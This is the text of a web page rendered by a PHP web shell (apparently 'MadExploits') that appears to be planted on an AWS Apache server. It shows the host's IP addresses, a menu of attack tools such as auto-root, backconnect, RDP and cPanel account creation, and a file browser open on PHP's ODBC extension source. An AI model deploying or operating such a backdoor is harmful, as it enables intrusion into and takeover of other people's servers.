Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.142.142.113
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
odbc /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
75
B
-rw-r--r--
config.m4
13.74
KB
-rw-r--r--
config.w32
951
B
-rw-r--r--
odbc.stub.php
5.45
KB
-rw-r--r--
odbc_arginfo.h
14.05
KB
-rw-r--r--
php_odbc.c
93.59
KB
-rw-r--r--
php_odbc.h
2
KB
-rw-r--r--
php_odbc_includes.h
7.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : php_odbc.h
/* +----------------------------------------------------------------------+ | Copyright (c) The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.01 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | https://www.php.net/license/3_01.txt | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Authors: Stig Sæther Bakken <ssb@php.net> | | Andreas Karajannis <Andreas.Karajannis@gmd.de> | | Kevin N. Shallow <kshallow@tampabay.rr.com> | +----------------------------------------------------------------------+ */ #ifndef PHP_ODBC_H #define PHP_ODBC_H #ifdef HAVE_UODBC #ifdef ZTS #include "TSRM.h" #endif extern zend_module_entry odbc_module_entry; #define odbc_module_ptr &odbc_module_entry #include "php_version.h" #define PHP_ODBC_VERSION PHP_VERSION #if defined(HAVE_DBMAKER) || defined(PHP_WIN32) || defined(HAVE_IBMDB2) || defined(HAVE_UNIXODBC) || defined(HAVE_IODBC) # define PHP_ODBC_HAVE_FETCH_HASH 1 #endif /* user functions */ PHP_MINIT_FUNCTION(odbc); PHP_MSHUTDOWN_FUNCTION(odbc); PHP_RINIT_FUNCTION(odbc); PHP_RSHUTDOWN_FUNCTION(odbc); PHP_MINFO_FUNCTION(odbc); #ifdef PHP_WIN32 # define PHP_ODBC_API __declspec(dllexport) #elif defined(__GNUC__) && __GNUC__ >= 4 # define PHP_ODBC_API __attribute__ ((visibility("default"))) #else # define PHP_ODBC_API #endif #else #define odbc_module_ptr NULL #endif /* HAVE_UODBC */ #define phpext_odbc_ptr odbc_module_ptr #endif /* PHP_ODBC_H */
Close